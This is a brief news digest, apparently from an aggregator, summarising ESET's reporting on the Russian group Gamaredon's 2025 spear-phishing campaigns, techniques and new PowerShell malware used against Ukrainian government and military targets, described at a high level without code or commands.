Gamaredon, a Russian APT group, has expanded its cyber attacks against Ukraine with new malware and tactics throughout 2025. The group has conducted 35 spear-phishing campaigns aimed at Ukrainian governmental and military institutions, focusing on exfiltrating sensitive data that could serve Russian interests in the ongoing conflict.
Gamaredon has intensified its cyber operations against Ukraine in 2025. ESET, a Slovakian cybersecurity firm, reported observing 35 distinct spear-phishing campaigns primarily targeting Ukrainian governmental and military organizations. These efforts are believed to support Russian interests amid the ongoing war.
The recent campaigns utilize various techniques including HTML smuggling through archive attachments and XHTML files. Malicious HTA downloaders are deployed to drop additional payloads like PteroSand, while some attacks exploit the patched WinRAR vulnerability (CVE-2025-8088) to achieve persistence.
In 2025, Gamaredon has shifted to relying more on third-party services for its operations. This includes using tunnel services and serverless platforms, which help conceal its actual back-end infrastructure, making detection and mitigation more challenging for defenders.
The group has added six new PowerShell tools to its custom malware arsenal, enhancing its capabilities. Tools like PteroDee and PteroCache focus on fetching and executing PowerShell payloads in memory, while PteroDum specializes in VBScript payloads.
β¨ This summary was generated by AI from the outlets' reporting listed below. It is not independently verified and may contain errors β check the original sources. How BrevFeed works β
Gamaredon, a Russian APT group, has expanded its cyber attacks against Ukraine with new malware and tactics throughout 2025. The group has conducted 35 spear-phishing campaigns aimed at Ukrainian governmental and military institutions, focusing on exfiltrating sensitive data that could serve Russian interests in the ongoing conflict.